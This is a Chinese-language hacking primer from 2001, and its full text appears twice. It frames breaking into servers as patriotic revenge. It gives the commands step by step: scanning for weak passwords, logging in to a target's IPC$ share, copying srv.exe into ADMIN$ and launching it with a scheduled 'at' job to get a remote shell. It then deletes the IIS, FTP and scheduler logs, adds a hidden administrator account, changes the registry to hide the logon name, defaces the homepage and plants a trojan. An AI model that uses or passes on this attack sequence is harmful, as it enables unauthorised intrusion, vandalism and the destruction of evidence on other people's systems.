Hellis新手入门手册
www.sandflee.net 2001-12-15 灰色轨迹
转自中国网络军团!
亲爱的菜鸟同志们,Hellis将带领你们进行保家卫国的网络自卫反击战.
1) 武器装备
建议配备: Win2K操作系统(安装有浏览器)、流光IV扫描器、win2K终端服务客户端软件;
2) 热身运动
先到命令行下,熟悉一下我们周边的环境.
2.1 ping
C:/>ping /?
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [-j host-list] | [-k host-list]
[-w timeout] destination-list
几个常用选项介绍:
Options:
-t 生命不息,ping就不停,Ctrl^C强制终止
-n count 发送count个ICMP echo报文
-l size 每个报文的大小
-i TTL 生存期,一般如果你和目标经过的网络节点大于TTL,那么你将到达不了目标
-w timeout 过了timeout毫秒对方的回应还没有来,就会说Request time out
示例:
ping -l 250 -w 3500 www.xxx.com -t
结果这些就差不多)
(1)对方给了回应:
Reply from xxx.xxx.xxx.xxx: bytes=250 time=110ms TTL=253
(2)没有这个名字的主机:
Unknown host www.xxx.com.
(3)连接到主机时间太长或者对方的防火墙或者主机屏蔽ICMP:
request timeout.
(4)对方已经关机或者防火墙在骗你:
destination unreachable.
2.2 telnet
c:/>telnet
Microsoft Telnet> help
close 关闭当前连接
display 显示操作参数
open 连接到一个站点
quit 退出 telnet
set 设置选项 (要列表,请键入 'set ?' )
status 打印状态信息
unset 解除设置选项 (要列表,请键入 'unset ?' )
?/help 打印帮助信息
Microsoft Telnet>set ?
Microsoft Telnet>unset ?
示例:
(1)打开本地回显.
Microsoft Telnet>set local_echo
(2)连接目标:
Microsoft Telnet>open 127.0.0.1 18888
正在连接到127.0.0.1...无法打开到主机的连接 在端口 18888 : 连接失败
否则就是对方画面啦~~
2.3 FTP
手工操作版:
c:/>ftp
C:/>ftp
ftp> ?
Commands may be abbreviated. Commands are:
! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
ftp>open www.ccc.com
Connected to www.xxx.com.
220 www.xxx.com FTP server
User (www.xxx.com:(none)):<填入你用的用户名,怎么找用户名后面再讲>
password:<填入你用的密码,怎么找密码后面再讲>
230 User Hellis logged in.
ftp>bin
ftp>ls
ftp>get srv.exe
ftp>bye
自动化版:
c:/>echo open www.xxx.com >d
c:/>echo 你的用户名 >>d
c:/>echo 你的密码 >>d
c:/>echo ls >>d !!!!!这里检查服务器是否正常建立数据传输连接
c:/>echo bin >>d !!!!!这里设置下载可执行文件需要的选项
c:/>echo get 你要的文件 >>d
c:/>echo bye >>d
c:/>ftp -s:d
等着吧~~~
2.4 net
c:/> net user
看看这个表哦,记得有那些用户
c:/>net user test test /add
c:/>net user
再看看,哦,有了用户test啦
c:/>net localgroup administrators test /add
右击"我的电脑"-->管理-->本地用户和组-->用户-->test-->属性-->隶属于
哇嘞,在administrators和users组啦,哈哈哈哈,这下可以想干啥就干啥了
热身完毕,开工
3) 众里寻她千百度
当然是使用流光IV了,"探测"-->"高级扫描工具"-->"起始地址"填入对方的地址-->开始!!!
接下来的时间上这里来看看文章吧......
!!!查看报告!!!
4) 家国仇,民族恨......
检查流光报告,注意如下内容:
(1) 有IPC弱口令
stupidAdmin (Admin):stupidPass !!!注意括号里面的Admin,口水都流出来了!!!
(2) Telnet简单口令
比较少...
(3) ftp简单口令
用处可能很大
(4) 有IIS remote_execute_X
国仇家恨,报他没问题!
(5) SQL sa帐户弱口令
很有用
IPC弱口令攻击:
c:/>net use //xxx.xxx.xxx.xxx "stupidPass" /user:stupidAdmin
命令成功完成.
c:/>net view //xxx.xxx.xxx.xxx
看到对方的共享列表喽
c:/>cd 流光安装目录/tools/
流光安装目录/tools>copy srv.exe //xxx.xxx.xxx.xxx/ADMIN$/system32/
等啊等....
1 file copied. !!!太好了!!!
流光安装目录/tools>at //xxx.xxx.xxx.xxx
清单是空的. !!!没有任务?我给你加啊~~~嘿嘿
如果报错,说服务没有开,那么这么做:
流光安装目录/tools>netsvc.exe schedule //xxx.xxx.xxx.xxx /start
服务成功启动. !!!YEAH,只是要等很长时间的,我有耐心~~~
流光安装目录/tools>net time //xxx.xxx.xxx.xxx
//xxx.xxx.xxx.xxx 的当前时间是 2001/12/13 下午 05:34
命令成功完成。
流光安装目录/tools>at //xxx.xxx.xxx.xxx 17:35 srv.exe
新加了一项作业,其作业 ID = 1 !!!等一会儿就开戏啦,我耐心,我耐心.....
实在等不及啦!!!
c:/>telnet xxx.xxx.xxx.xxx 99
正在连接到xxx.xxx.xxx.xxx .....
Microsoft Windows 2000 [セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:/WINNT/system32> !!!哈哈哈哈,进来乐!!!
毁尸灭迹先
C:/WINNT/system32>cd logfiles
C:/WINNT/system32/logfiles>cd w3svc1
C:/WINNT/system32/logfiles/w3svc1>net stop w3svc
C:/WINNT/system32/logfiles/w3svc1>del *
C:/WINNT/system32/logfiles/w3svc1>net start w3svc
C:/WINNT/system32/logfiles/w3svc1>cd ..
C:/WINNT/system32/logfiles>cd msftpsvc1
C:/WINNT/system32/logfiles/msftpsvc1>net stop msftpsvc
C:/WINNT/system32/logfiles/msftpsvc1>del *
C:/WINNT/system32/logfiles/msftpsvc1>net start msftpsvc
C:/WINNT/system32/logfiles/msftpsvc1>cd c:/winnt/system32/
C:/WINNT/system32> net stop schedule
C:/WINNT/system32> del schedu*.txt
C:/WINNT/system32> net start schedule
开始修改
c:/WINNT/system32>net user IUSER_WWW 自己设密码啊 /add
c:/WINNT/system32>net localgroup administrators IUSER_WWW /add
哈哈,增加一个有Admin权限的用户,不过名字不要取什么UrHacked之类太露骨的名字哦,
密码要复杂一点点,记得你是凭什么进这机器的......
如果流光报告显示这家伙开了3389,那么打开win2K终端服务客户端,填入地址xxx.xxx.xxx.xxx,连接!!!
用户名: IUSER_WWW
密码: 你不会这么快忘记了吧
!!!OK!!!
run->regedit->local_machine->software->microsoft->winnt->currentver->winlogon->dontdisplaylastlogin
修改成1,下次他登录就看不到你用的名字喽~~~~
其他注册表修改就到这里来查查啦,别太懒~~~~
有首页,哈哈,改它没商量!
找到首页,重命名
新建一个首页,你爱写点啥就写点啥吧.
想长期控制这台机器?让它骑"马"就是了.(给他装个木马.)
IUSER_WWW,宝贝别哭,就算删了你,我还能放"马"过来~~~~
仇,
永远报不完.
所以我们去找下一台
www.sandflee.net 2001-12-15 灰色轨迹
转自中国网络军团!
亲爱的菜鸟同志们,Hellis将带领你们进行保家卫国的网络自卫反击战.
1) 武器装备
建议配备: Win2K操作系统(安装有浏览器)、流光IV扫描器、win2K终端服务客户端软件;
2) 热身运动
先到命令行下,熟悉一下我们周边的环境.
2.1 ping
C:/>ping /?
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [-j host-list] | [-k host-list]
[-w timeout] destination-list
几个常用选项介绍:
Options:
-t 生命不息,ping就不停,Ctrl^C强制终止
-n count 发送count个ICMP echo报文
-l size 每个报文的大小
-i TTL 生存期,一般如果你和目标经过的网络节点大于TTL,那么你将到达不了目标
-w timeout 过了timeout毫秒对方的回应还没有来,就会说Request time out
示例:
ping -l 250 -w 3500 www.xxx.com -t
结果这些就差不多)
(1)对方给了回应:
Reply from xxx.xxx.xxx.xxx: bytes=250 time=110ms TTL=253
(2)没有这个名字的主机:
Unknown host www.xxx.com.
(3)连接到主机时间太长或者对方的防火墙或者主机屏蔽ICMP:
request timeout.
(4)对方已经关机或者防火墙在骗你:
destination unreachable.
2.2 telnet
c:/>telnet
Microsoft Telnet> help
close 关闭当前连接
display 显示操作参数
open 连接到一个站点
quit 退出 telnet
set 设置选项 (要列表,请键入 'set ?' )
status 打印状态信息
unset 解除设置选项 (要列表,请键入 'unset ?' )
?/help 打印帮助信息
Microsoft Telnet>set ?
Microsoft Telnet>unset ?
示例:
(1)打开本地回显.
Microsoft Telnet>set local_echo
(2)连接目标:
Microsoft Telnet>open 127.0.0.1 18888
正在连接到127.0.0.1...无法打开到主机的连接 在端口 18888 : 连接失败
否则就是对方画面啦~~
2.3 FTP
手工操作版:
c:/>ftp
C:/>ftp
ftp> ?
Commands may be abbreviated. Commands are:
! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
ftp>open www.ccc.com
Connected to www.xxx.com.
220 www.xxx.com FTP server
User (www.xxx.com:(none)):<填入你用的用户名,怎么找用户名后面再讲>
password:<填入你用的密码,怎么找密码后面再讲>
230 User Hellis logged in.
ftp>bin
ftp>ls
ftp>get srv.exe
ftp>bye
自动化版:
c:/>echo open www.xxx.com >d
c:/>echo 你的用户名 >>d
c:/>echo 你的密码 >>d
c:/>echo ls >>d !!!!!这里检查服务器是否正常建立数据传输连接
c:/>echo bin >>d !!!!!这里设置下载可执行文件需要的选项
c:/>echo get 你要的文件 >>d
c:/>echo bye >>d
c:/>ftp -s:d
等着吧~~~
2.4 net
c:/> net user
看看这个表哦,记得有那些用户
c:/>net user test test /add
c:/>net user
再看看,哦,有了用户test啦
c:/>net localgroup administrators test /add
右击"我的电脑"-->管理-->本地用户和组-->用户-->test-->属性-->隶属于
哇嘞,在administrators和users组啦,哈哈哈哈,这下可以想干啥就干啥了
热身完毕,开工
3) 众里寻她千百度
当然是使用流光IV了,"探测"-->"高级扫描工具"-->"起始地址"填入对方的地址-->开始!!!
接下来的时间上这里来看看文章吧......
!!!查看报告!!!
4) 家国仇,民族恨......
检查流光报告,注意如下内容:
(1) 有IPC弱口令
stupidAdmin (Admin):stupidPass !!!注意括号里面的Admin,口水都流出来了!!!
(2) Telnet简单口令
比较少...
(3) ftp简单口令
用处可能很大
(4) 有IIS remote_execute_X
国仇家恨,报他没问题!
(5) SQL sa帐户弱口令
很有用
IPC弱口令攻击:
c:/>net use //xxx.xxx.xxx.xxx "stupidPass" /user:stupidAdmin
命令成功完成.
c:/>net view //xxx.xxx.xxx.xxx
看到对方的共享列表喽
c:/>cd 流光安装目录/tools/
流光安装目录/tools>copy srv.exe //xxx.xxx.xxx.xxx/ADMIN$/system32/
等啊等....
1 file copied. !!!太好了!!!
流光安装目录/tools>at //xxx.xxx.xxx.xxx
清单是空的. !!!没有任务?我给你加啊~~~嘿嘿
如果报错,说服务没有开,那么这么做:
流光安装目录/tools>netsvc.exe schedule //xxx.xxx.xxx.xxx /start
服务成功启动. !!!YEAH,只是要等很长时间的,我有耐心~~~
流光安装目录/tools>net time //xxx.xxx.xxx.xxx
//xxx.xxx.xxx.xxx 的当前时间是 2001/12/13 下午 05:34
命令成功完成。
流光安装目录/tools>at //xxx.xxx.xxx.xxx 17:35 srv.exe
新加了一项作业,其作业 ID = 1 !!!等一会儿就开戏啦,我耐心,我耐心.....
实在等不及啦!!!
c:/>telnet xxx.xxx.xxx.xxx 99
正在连接到xxx.xxx.xxx.xxx .....
Microsoft Windows 2000 [セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:/WINNT/system32> !!!哈哈哈哈,进来乐!!!
毁尸灭迹先
C:/WINNT/system32>cd logfiles
C:/WINNT/system32/logfiles>cd w3svc1
C:/WINNT/system32/logfiles/w3svc1>net stop w3svc
C:/WINNT/system32/logfiles/w3svc1>del *
C:/WINNT/system32/logfiles/w3svc1>net start w3svc
C:/WINNT/system32/logfiles/w3svc1>cd ..
C:/WINNT/system32/logfiles>cd msftpsvc1
C:/WINNT/system32/logfiles/msftpsvc1>net stop msftpsvc
C:/WINNT/system32/logfiles/msftpsvc1>del *
C:/WINNT/system32/logfiles/msftpsvc1>net start msftpsvc
C:/WINNT/system32/logfiles/msftpsvc1>cd c:/winnt/system32/
C:/WINNT/system32> net stop schedule
C:/WINNT/system32> del schedu*.txt
C:/WINNT/system32> net start schedule
开始修改
c:/WINNT/system32>net user IUSER_WWW 自己设密码啊 /add
c:/WINNT/system32>net localgroup administrators IUSER_WWW /add
哈哈,增加一个有Admin权限的用户,不过名字不要取什么UrHacked之类太露骨的名字哦,
密码要复杂一点点,记得你是凭什么进这机器的......
如果流光报告显示这家伙开了3389,那么打开win2K终端服务客户端,填入地址xxx.xxx.xxx.xxx,连接!!!
用户名: IUSER_WWW
密码: 你不会这么快忘记了吧
!!!OK!!!
run->regedit->local_machine->software->microsoft->winnt->currentver->winlogon->dontdisplaylastlogin
修改成1,下次他登录就看不到你用的名字喽~~~~
其他注册表修改就到这里来查查啦,别太懒~~~~
有首页,哈哈,改它没商量!
找到首页,重命名
新建一个首页,你爱写点啥就写点啥吧.
想长期控制这台机器?让它骑"马"就是了.(给他装个木马.)
IUSER_WWW,宝贝别哭,就算删了你,我还能放"马"过来~~~~
仇,
永远报不完.
所以我们去找下一台